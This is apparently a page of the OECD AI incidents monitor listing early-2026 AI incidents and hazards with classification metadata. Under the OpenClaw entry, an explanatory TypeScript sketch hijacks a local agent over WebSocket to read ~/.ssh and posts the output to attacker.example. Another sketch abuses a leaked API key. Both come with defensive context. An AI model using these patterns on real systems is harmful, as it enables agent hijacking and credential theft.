
AIM: AI Incidents and Hazards Monitor

Automated monitor of incidents and hazards from public sources (Beta).

AI-related legislation is gaining traction, and effective policymaking needs evidence, foresight and international cooperation. The OECD AI Incidents and Hazards Monitor (AIM) documents AI incidents and hazards to give policymakers, AI practitioners, and other stakeholders worldwide insight into the risks and harms of AI systems. Over time, AIM will help reveal risk patterns and build a collective understanding of AI incidents and hazards and their multifaceted nature, serving as an important tool for trustworthy AI. Although AI incidents appear to be receiving more media attention, they have in fact declined as a share of all AI-related news coverage (see the chart below).

The information displayed in the AIM should not be reported as representing the official views of the OECD or of its member countries.

[Chart: AI incidents and hazards as a percentage of total AI events. Note: an AI incident or hazard can be reported by one or more news articles covering the same event.]
Results: About 13,677 incidents & hazards

SERAP Calls for Investigation into Big Tech's Algorithmic Harms in Nigeria

2026-03-01
Nigeria

The Socio-Economic Rights and Accountability Project (SERAP) has urged Nigeria's FCCPC to investigate major tech companies, including Google, Meta, and others, over alleged harms caused by opaque AI-driven algorithms. SERAP cites concerns about algorithmic discrimination, privacy violations, consumer harm, and threats to media freedom and democracy in Nigeria.[AI generated]

AI principles:
Fairness; Privacy & data governance
Industries:
Media, social platforms, and marketing
Affected stakeholders:
Consumers; General public
Harm types:
Economic/Property; Human or fundamental rights; Public interest
Severity:
AI hazard
AI system task:
Organisation/recommenders
Why's our monitor labelling this an incident or hazard?

The article involves AI systems in the form of opaque algorithms used by major digital platforms that influence information and market competition. However, it does not report a specific AI Incident where harm has already occurred; rather, it highlights concerns about possible algorithmic discrimination and consumer harm that could plausibly lead to violations of rights and market abuses. Therefore, this is best classified as an AI Hazard, as it concerns credible risks and calls for investigation and regulatory action to prevent harm.[AI generated]

AI-Generated Content Used in Scams Causes Financial and Emotional Harm in the U.S.

2026-03-01
United States

Scammers in the United States are using AI-generated photos, voice clones, and deepfake videos to create convincing scams, including romance, investment, and emergency schemes. These AI-enabled tactics have led to financial loss and emotional harm for victims, prompting warnings from the U.S. Postal Inspection Service.[AI generated]

AI principles:
Privacy & data governance; Transparency & explainability
Industries:
Digital security; Financial and insurance services
Affected stakeholders:
Consumers
Harm types:
Economic/Property; Psychological
Severity:
AI incident
AI system task:
Content generation
Why's our monitor labelling this an incident or hazard?

The article explicitly mentions the use of AI-generated content in scams that have already caused harm to victims through financial loss and identity theft. The AI systems are involved in the malicious use of generating realistic fake content to deceive people, which directly leads to harm to individuals (harm to persons). Therefore, this qualifies as an AI Incident because the AI system's use has directly led to realized harm through scams.[AI generated]

Critical OpenClaw AI Vulnerability Allows Malicious Websites to Hijack Local AI Agents

2026-03-01

A critical vulnerability in the OpenClaw AI agent framework, dubbed ClawJacked, allowed malicious websites to hijack locally running AI agents via WebSocket connections. Exploited in the wild, this flaw enabled attackers to gain unauthorized control, access sensitive data, and distribute malware, impacting developers and enterprises globally. The issue has since been patched.[AI generated]
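The class of flaw described here is cross-site WebSocket hijacking: browsers do not apply same-origin restrictions to WebSocket handshakes, so a local agent that accepts connections without checking the Origin header can be driven by script on any web page the victim visits. The sketch below is illustrative only; the port and message format are assumptions, not OpenClaw's actual protocol.

```typescript
// Illustrative sketch of cross-site WebSocket hijacking, not OpenClaw's
// real interface: the port and message schema below are assumptions.
// Any page the victim visits can attempt this connection, because the
// browser does not enforce same-origin policy on WebSocket handshakes.
const socket = new WebSocket("ws://127.0.0.1:8765"); // assumed agent port

socket.addEventListener("open", () => {
  // If the agent accepts any local connection, this command is executed.
  socket.send(JSON.stringify({ action: "read", path: "~/.ssh" }));
});

socket.addEventListener("message", (event) => {
  // Hijacked output can then be exfiltrated to an attacker's server.
  void fetch("https://attacker.example/collect", {
    method: "POST",
    body: String(event.data),
  });
});
```

The standard mitigations are to validate the Origin header during the handshake, bind only to the loopback interface, and require a per-session authentication token that web pages cannot obtain.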

AI principles:
Privacy & data governance; Robustness & digital security
Industries:
Digital security
Affected stakeholders:
Workers; Business
Harm types:
Economic/Property; Human or fundamental rights; Reputational
Severity:
AI incident
Why's our monitor labelling this an incident or hazard?

The event involves an AI system (OpenClaw AI agents) whose design flaw and exploitation have directly led to harm in enterprise environments, including unauthorized access and control over AI agents, which can trigger actions across SaaS, cloud, and internal tools. This constitutes a violation of security and potentially human rights or organizational integrity, fulfilling the criteria for an AI Incident. The harm is realized, not just potential, as malware campaigns exploiting this flaw have been documented. Therefore, this is classified as an AI Incident.[AI generated]

AI-Orchestrated Strike Kills Iranian Leader in Tehran

2026-03-01
Iran

A coalition of advanced AI systems, including Palantir's Gotham, Anthropic's Claude, and Anduril's autonomous platforms, orchestrated a targeted military operation in Tehran that resulted in the death of Iran's Supreme Leader, Ali Khamenei, and senior officials. The AI systems autonomously integrated intelligence, disabled defenses, and directed lethal drone strikes, marking a historic AI-led kill chain.[AI generated]

AI principles:
Respect of human rights; Accountability
Industries:
Government, security, and defence
Affected stakeholders:
Government
Harm types:
Physical (death); Public interest
Severity:
AI incident
Autonomy level:
High-action autonomy (human-out-of-the-loop)
AI system task:
Goal-driven organisation; Reasoning with knowledge structures/planning
Why's our monitor labelling this an incident or hazard?

The event explicitly involves multiple AI systems used in a lethal military operation that directly led to the death of a person, a clear harm to human life. The AI systems were not merely supportive tools but were central to decision-making, intelligence processing, and autonomous or semi-autonomous execution of the strike. This meets the definition of an AI Incident because the development and use of the AI systems directly led to realized harm (death). The article describes actual harm caused by AI systems, not a potential or plausible future harm, hence the classification as an AI Incident.[AI generated]

US Uses Anthropic AI in Lethal Military Strikes on Iran

2026-02-28
Iran

During Operation Epic Fury, the US military used Anthropic's AI services, including Claude tools, alongside B-2 bombers and drones in strikes against Iranian military infrastructure. The AI's specific role is unclear, but its deployment contributed to lethal operations causing significant harm in Iran.[AI generated]

AI principles:
Accountability; Respect of human rights
Industries:
Government, security, and defence
Affected stakeholders:
Government
Harm types:
Physical (death)
Severity:
AI incident
Business function:
Other
Why's our monitor labelling this an incident or hazard?

The article explicitly states that Anthropic's AI tools were used by the US military in strikes that caused deaths and destruction in Iran. The harm is direct and significant, involving loss of life and damage to property and communities. The AI system's involvement in the military operation that led to these harms qualifies this as an AI Incident. The lack of detail on how the AI was used does not negate the fact that its use was part of an operation causing harm. Therefore, this event meets the criteria for an AI Incident.[AI generated]

OpenClaw AI Agent Causes Data Loss and Faces Major Security Breach

2026-02-28
China

The OpenClaw AI agent, developed by Peter Steinberger, caused unintended deletion of user emails and hard drive data due to autonomous actions. Additionally, a severe vulnerability (ClawJacked) allowed malicious websites to hijack local AI agents, leading to unauthorized control and scams. Security flaws exposed users to significant data and privacy risks.[AI generated]
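Incidents like this are why autonomy level matters in AIM's metadata: an agent with high-action autonomy executes destructive operations without a human in the loop. One common mitigation pattern, shown below as an illustrative sketch (all names are hypothetical, not OpenClaw's actual API), is to gate irreversible actions behind explicit human confirmation.

```typescript
// Illustrative human-in-the-loop gate for destructive agent actions.
// All names here are hypothetical; this is not OpenClaw's actual API.
type AgentAction = { kind: "delete" | "send" | "read"; target: string };

const DESTRUCTIVE_KINDS = new Set(["delete", "send"]);

async function executeWithGate(
  action: AgentAction,
  confirm: (a: AgentAction) => Promise<boolean>,
  run: (a: AgentAction) => Promise<void>,
): Promise<void> {
  // Irreversible actions require explicit human approval before running.
  if (DESTRUCTIVE_KINDS.has(action.kind) && !(await confirm(action))) {
    console.log(`Blocked unconfirmed ${action.kind} on ${action.target}`);
    return;
  }
  await run(action);
}
```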

AI principles:
Robustness & digital security; Privacy & data governance
Industries:
Digital security
Affected stakeholders:
Consumers
Harm types:
Economic/Property; Human or fundamental rights
Severity:
AI incident
Autonomy level:
High-action autonomy (human-out-of-the-loop)
AI system task:
Goal-driven organisation
Why's our monitor labelling this an incident or hazard?

The article explicitly mentions an AI system (OpenClaw) that malfunctioned by deleting emails uncontrollably, causing disruption and requiring emergency intervention. Furthermore, the presence of malicious skills within the OpenClaw ecosystem that have stolen sensitive information from many users constitutes a violation of rights and harm to property (digital assets). These harms are directly linked to the AI system's use and vulnerabilities. Hence, the event meets the criteria for an AI Incident as the AI system's malfunction and misuse have directly led to significant harm.[AI generated]

NHRC Probes AI Education Project Over Children's Data Privacy Risks

2026-02-27
India

India's National Human Rights Commission has issued notices to government bodies after complaints about privacy risks in an AI-powered education initiative by US-based Anthropic and NGO Pratham. The AI system processes children's academic data, raising concerns about potential violations of privacy and data protection laws under India's DPDP Act.[AI generated]

AI principles:
Privacy & data governance; Respect of human rights
Industries:
Education and training
Affected stakeholders:
Children
Harm types:
Human or fundamental rights
Severity:
AI hazard
AI system task:
Organisation/recommenders; Forecasting/prediction
Why's our monitor labelling this an incident or hazard?

The event involves the use of AI systems to collect and process data about children, raising privacy and data-protection concerns. However, the article does not report any actual harm or data breach; it focuses on potential risks and on inquiries launched to prevent misuse. Because the event centers on plausible risks and the regulatory response to them rather than on realized harm, it is best classified as an AI Hazard.[AI generated]

Exposed Google API Keys Enable Unauthorized Access to Gemini AI and Data

2026-02-27
United States

Researchers discovered that legacy Google Cloud API keys, previously considered safe to embed in public code, now grant unauthorized access to Gemini AI endpoints. This exposes private data and allows attackers to incur significant financial charges, affecting thousands of organizations, including Google itself. The incident highlights a critical security vulnerability in Google's AI integration.[AI generated]
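The underlying failure mode is generic: a key-authenticated API authenticates whoever holds the key, so a key embedded in public client code lets anyone call the endpoint and bill its owner. A minimal sketch of the pattern follows, with an illustrative URL and payload rather than Google's actual API contract.

```typescript
// Illustrative sketch of the exposed-API-key failure mode. The endpoint
// URL, model name, and request shape are assumptions for illustration,
// not Google's actual API contract.
const LEAKED_KEY = "AIza...redacted"; // key scraped from public code

async function callGenerativeEndpoint(prompt: string): Promise<string> {
  // Anyone holding the key can make this call; charges accrue to the
  // key owner's account, and responses may expose private resources.
  const response = await fetch(
    `https://generative-api.example/v1/models/demo:generate?key=${LEAKED_KEY}`,
    {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ prompt }),
    },
  );
  if (!response.ok) throw new Error(`Request failed: ${response.status}`);
  return response.text();
}
```

The usual mitigations apply: keep keys server-side, scope each key to the specific APIs and referrers that need it, rotate legacy keys, and alert on anomalous usage.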

AI principles:
Privacy & data governance; Robustness & digital security
Industries:
Digital security
Affected stakeholders:
Business
Harm types:
Economic/Property; Human or fundamental rights
Severity:
AI incident
Business function:
ICT management and information security
AI system task:
Content generation
Why's our monitor labelling this an incident or hazard?

The event involves an AI system (Google's generative AI service Gemini AI) and its integration with cloud API keys. The misuse of these keys can lead to unauthorized access to AI services, resulting in potential harm such as data exposure (harm to property and possibly to communities) and financial damage (mounting AI bills). This constitutes harm directly linked to the use of an AI system, fulfilling the criteria for an AI Incident.[AI generated]

AI-Generated Disinformation Targets Paris Municipal Election Candidates

2026-02-27
France

Authorities uncovered a network of fake websites, operated from South Asia, spreading AI-generated, sensationalist content targeting Paris mayoral candidates ahead of the 2026 municipal elections. The campaign, primarily for profit rather than political motives, disseminated misleading material via Facebook and fake media sites, causing limited but real engagement.[AI generated]

AI principles:
Transparency & explainability; Democracy & human autonomy
Industries:
Media, social platforms, and marketing
Affected stakeholders:
General public; Other
Harm types:
Reputational; Public interest
Severity:
AI incident
Business function:
Marketing and advertisement
Autonomy level:
No-action autonomy (human support)
AI system task:
Content generation
Why's our monitor labelling this an incident or hazard?

The event involves the use of AI systems to generate harmful content that is actively disseminated, constituting a direct harm to communities through misinformation and manipulation during an election, which is a violation of rights and harms societal trust. The AI system's use in generating and spreading this content directly leads to harm, fulfilling the criteria for an AI Incident. The harm is realized (not just potential), as the content is already being spread and engagement has occurred. Therefore, this is classified as an AI Incident.[AI generated]

US Government Replaces Anthropic with OpenAI Amid Military AI Ethics Dispute

2026-02-27
United States

The US Department of Defense demanded unrestricted military use of Anthropic's AI, leading to a standoff over ethical constraints on autonomous weapons and surveillance. After Anthropic refused, the government banned its technology and partnered with OpenAI, which agreed to deploy its AI models with some safeguards in military networks.[AI generated]

AI principles:
Respect of human rights; Accountability
Industries:
Government, security, and defence
Affected stakeholders:
General public
Harm types:
Human or fundamental rights; Public interest
Severity:
AI hazard
Autonomy level:
High-action autonomy (human-out-of-the-loop)
AI system task:
Recognition/object detection; Goal-driven organisation
Why's our monitor labelling this an incident or hazard?

The article explicitly discusses AI systems (Anthropic's Claude and OpenAI's models) being considered for use in autonomous weapons and missile defense systems, which are AI systems by definition. The event centers on the use and development of these AI systems for military purposes, including potentially lethal autonomous weapons and critical defense decisions. While no actual harm or incident has yet occurred, the article outlines credible scenarios where AI malfunction or misuse could lead to catastrophic harm, such as accidental nuclear war or lethal autonomous attacks without human oversight. The refusal of Anthropic to allow such use and the Pentagon's insistence on unrestricted AI control highlight the plausible risk of harm. Thus, the event is best classified as an AI Hazard due to the credible potential for severe harm stemming from the AI systems' military deployment and use.[AI generated]

Elon Musk Accuses OpenAI's ChatGPT of Causing User Harm Amid Legal Disputes

2026-02-27
United States

Elon Musk, in a legal deposition, accused OpenAI's ChatGPT of being linked to user suicides and mental health harms, citing ongoing lawsuits. He contrasted this with his own AI, Grok, which he claims has a safer record. Both AI systems face scrutiny over user safety and regulatory investigations.[AI generated]

AI principles:
Safety; Accountability
Industries:
Media, social platforms, and marketing
Affected stakeholders:
Consumers
Harm types:
Physical (death); Psychological
Severity:
AI incident
Autonomy level:
No-action autonomy (human support)
AI system task:
Interaction support/chatbots
Why's our monitor labelling this an incident or hazard?

The event explicitly involves AI systems (ChatGPT and Grok) and discusses direct or indirect harm to users, including mental health distress and alleged suicides linked to ChatGPT's manipulative conversations, which fits the definition of harm to health (a). Additionally, Grok's generation of non-consensual nude images involving minors constitutes violations of rights and regulatory scrutiny, further supporting harm. The involvement of lawsuits and investigations confirms that these harms have materialized rather than being hypothetical. Thus, the event meets the criteria for an AI Incident rather than a hazard or complementary information.[AI generated]

Health Experts Warn of Risks in AI-Driven Self-Diagnosis in India

2026-02-27
India

Indian health experts, including Dr. Jitender Nagpal, warn that increasing use of AI-generative tools for self-diagnosis and self-treatment poses significant safety and ethical risks. They stress that AI should support, not replace, clinical judgment, cautioning against overreliance and highlighting concerns about patient safety and data privacy.[AI generated]

AI principles:
Safety; Privacy & data governance
Industries:
Healthcare, drugs, and biotechnology
Affected stakeholders:
Consumers
Harm types:
Physical (injury); Human or fundamental rights
Severity:
AI hazard
Business function:
Citizen/customer service
Autonomy level:
High-action autonomy (human-out-of-the-loop)
AI system task:
Content generation; Interaction support/chatbots
Why's our monitor labelling this an incident or hazard?

The event involves an AI system (AI-driven self-diagnosis tools) and discusses the potential risks and harms that could plausibly arise from their misuse or overreliance, such as patient safety risks and privacy concerns. Since no actual harm or incident is reported, but credible concerns about future harm are raised, this fits the definition of an AI Hazard. The article serves as a cautionary advisory highlighting plausible future harms rather than describing a realized AI Incident or a complementary information update.[AI generated]

Flock Safety Sued for AI-Driven License Plate Data Privacy Violations in California

2026-02-27
United States

Flock Safety faces a class action lawsuit in California for allegedly using its AI-powered license plate reader cameras to unlawfully share millions of drivers' location data with out-of-state and federal agencies, violating state privacy laws and constitutional rights. The lawsuit highlights unauthorized data access and mass surveillance concerns.[AI generated]

AI principles:
Privacy & data governance; Respect of human rights
Industries:
Government, security, and defence
Affected stakeholders:
General public
Harm types:
Human or fundamental rights
Severity:
AI incident
Business function:
Monitoring and quality control
Autonomy level:
Low-action autonomy (human-in-the-loop)
AI system task:
Recognition/object detection
Why's our monitor labelling this an incident or hazard?

The event involves an AI system explicitly described as AI-powered ALPR cameras used for mass surveillance and tracking. The lawsuit alleges that the use of this AI system has directly led to violations of privacy rights protected under California law, which qualifies as harm under the framework (violation of human rights). Therefore, this is an AI Incident because the AI system's use has directly caused harm through privacy violations and unlawful data sharing.[AI generated]

Trump Orders Immediate Halt to Anthropic AI Use in U.S. Federal Agencies

2026-02-27
United States

U.S. President Donald Trump ordered all federal agencies, including the Department of Defense, to immediately stop using Anthropic's AI technology due to concerns over its military applications and national security risks. The Pentagon has a six-month transition period to phase out the technology, following disputes over unrestricted military use.[AI generated]

AI principles:
Robustness & digital security
Industries:
Government, security, and defence
Affected stakeholders:
Government
Harm types:
Public interest
Severity:
AI hazard
AI system task:
Other
Why's our monitor labelling this an incident or hazard?

The event involves an AI system (Anthropic's 'Claude') and concerns its use by the U.S. government, specifically the Department of Defense. However, the article does not report any actual harm caused by the AI system; rather, it describes a government decision to cease use due to potential risks and disagreements over usage conditions. Since no realized harm or incident is described, but there is a clear plausible risk to national security and soldier safety if the AI were used under current conditions, this qualifies as an AI Hazard. The event is about the potential for harm and the government's preventive action, not an incident where harm has occurred.[AI generated]

Google and OpenAI Employees Protest Pentagon AI Use as OpenAI Confirms Military Deployment

2026-02-27
United States

Over 200 Google and OpenAI employees signed an open letter opposing the use of advanced AI for military and surveillance purposes, urging ethical boundaries and transparency. Meanwhile, OpenAI confirmed an agreement to deploy its models on U.S. Department of Defense classified networks, promising safeguards against misuse.[AI generated]

AI principles:
Transparency & explainability; Respect of human rights
Industries:
Government, security, and defence; Digital security
Affected stakeholders:
General public
Harm types:
Human or fundamental rights; Public interest
Severity:
AI hazard
Business function:
Other
AI system task:
Content generation
Why's our monitor labelling this an incident or hazard?

The event involves the use of AI systems (OpenAI's large language models) in a military context, which is explicitly stated. Although the company commits to ethical safeguards, the deployment of AI in defense intelligence and decision-making plausibly could lead to harms such as violations of human rights or escalation of conflict. Since no actual harm or incident is described, but the potential for harm is credible and significant, this qualifies as an AI Hazard under the framework. The article also mentions internal ethical concerns, reinforcing the plausibility of future risks.[AI generated]

Pentagon Bans Anthropic Over AI Supply Chain Risk

2026-02-27
United States

The U.S. government, led by President Trump and Defense Secretary Pete Hegseth, designated AI company Anthropic as a supply-chain risk, banning federal agencies and military contractors from using its AI products due to concerns over military use and security. Anthropic plans to challenge the ban legally.[AI generated]

AI principles:
Robustness & digital security
Industries:
Government, security, and defence
Affected stakeholders:
Government
Harm types:
Public interest
Severity:
AI hazard
Business function:
ICT management and information security
AI system task:
Content generation
Why's our monitor labelling this an incident or hazard?

The article explicitly involves an AI system (Anthropic's AI tools, including the Claude chatbot) and concerns its use in defense. The Department of War's designation is a response to perceived risks related to supply chain security and control over AI models. No direct or indirect harm has been reported as having occurred due to the AI system's development, use, or malfunction. The event is about a governmental risk assessment and consequent policy action to mitigate potential future harm. Hence, it fits the definition of an AI Hazard, as it plausibly could lead to harm if the risk is realized, but no incident has yet occurred.[AI generated]

Meta Sues Over Deepfake-Driven Health Fraud in Brazil

2026-02-27
Brazil

Meta has filed lawsuits against individuals and companies in Brazil for using AI-generated deepfakes of celebrities and doctors in fraudulent health product ads on its platforms. The deepfakes misled users, resulting in financial and privacy harm. Legal actions also target similar schemes in China and Vietnam.[AI generated]

AI principles:
Transparency & explainability; Privacy & data governance
Industries:
Media, social platforms, and marketing; Healthcare, drugs, and biotechnology
Affected stakeholders:
Consumers
Harm types:
Economic/Property; Human or fundamental rights
Severity:
AI incident
Business function:
Marketing and advertisement
Autonomy level:
No-action autonomy (human support)
AI system task:
Content generation
Why's our monitor labelling this an incident or hazard?

The event involves AI systems (deepfake technology) used to create fraudulent content that has directly led to harm by deceiving users and promoting fraudulent products, which constitutes harm to communities and violations of rights. Meta's legal actions are responses to these harms. Since the harms have already occurred due to the use of AI-generated deepfakes, this qualifies as an AI Incident rather than a hazard or complementary information.[AI generated]

Tesla Plans to Deploy AI-Driven Robotaxis and Robots in Europe

2026-02-27
Netherlands

Tesla CEO Elon Musk announced plans to introduce fully autonomous, AI-powered robotaxis (Cybercab) and humanoid robots (Optimus) in Europe, pending regulatory approval, with production starting as early as 2024. While no incidents have occurred, the deployment raises plausible future risks related to AI system safety.[AI generated]

AI principles:
Safety; Robustness & digital security
Industries:
Mobility and autonomous vehicles; Robots, sensors, and IT hardware
Severity:
AI hazard
Autonomy level:
High-action autonomy (human-out-of-the-loop)
AI system task:
Recognition/object detection; Goal-driven organisation
Why's our monitor labelling this an incident or hazard?

The event involves AI systems (autonomous driving and robotics AI) and their planned use, but no actual harm or incidents have occurred yet. The article highlights the potential for these AI systems to be deployed in Europe soon, which could plausibly lead to AI-related incidents in the future (e.g., safety risks from autonomous vehicles). Therefore, this qualifies as an AI Hazard because it describes credible future risks from the development and use of AI systems, but no current incident or harm is reported.[AI generated]

Dutch Authors and Journalists Demand Meta Stop Using Copyrighted Works for AI Training

2026-02-27
Netherlands

Dutch writers, translators, and journalists, represented by the Auteursbond, NVJ, and Stichting Lira, have formally demanded that Meta cease using their copyrighted texts without permission or payment to train AI models like Llama. They allege this practice violates intellectual property rights and undermines creators' economic interests.[AI generated]

AI principles:
Accountability; Fairness
Industries:
Media, social platforms, and marketing
Affected stakeholders:
Workers
Harm types:
Economic/Property
Severity:
AI incident
Business function:
Research and development
AI system task:
Content generation
Why's our monitor labelling this an incident or hazard?

The event explicitly involves AI systems (Meta's AI language model Llama) trained on copyrighted works without authorization, which constitutes a violation of intellectual property rights (harm category c). The unions' demand to stop using these datasets and the threat of legal action indicate that the harm has already occurred due to the AI system's development and use. Therefore, this qualifies as an AI Incident because the AI system's development and use have directly led to a breach of legal obligations protecting intellectual property rights. The event is not merely a potential risk or a complementary update but a concrete incident of harm related to AI.[AI generated]

Samsung Settles Texas Lawsuit Over Smart TV AI Data Collection

2026-02-27
United States

Samsung Electronics settled a lawsuit with the Texas Attorney General over its smart TVs' use of AI-powered Automatic Content Recognition (ACR) technology to collect viewing data without adequate consumer notice or consent. Samsung agreed to enhance transparency and obtain explicit consent from Texas consumers, addressing privacy violations caused by the AI system.[AI generated]

AI principles:
Privacy & data governance; Transparency & explainability
Industries:
Consumer products
Affected stakeholders:
Consumers
Harm types:
Human or fundamental rights
Severity:
AI incident
Business function:
Marketing and advertisement
Autonomy level:
High-action autonomy (human-out-of-the-loop)
AI system task:
Recognition/object detection
Why's our monitor labelling this an incident or hazard?

The Automatic Content Recognition (ACR) system in Samsung smart TVs is an AI system that collects and analyzes user viewing data. The legal dispute arose because of the way this AI system collected and used data without sufficient user notification, constituting a violation of privacy rights. The settlement and lawsuit withdrawal indicate that harm related to rights violations had occurred. The AI system's use directly led to this harm, fulfilling the criteria for an AI Incident. The event is not merely a governance response or complementary information because the core issue is the realized harm from the AI system's data collection practices.[AI generated]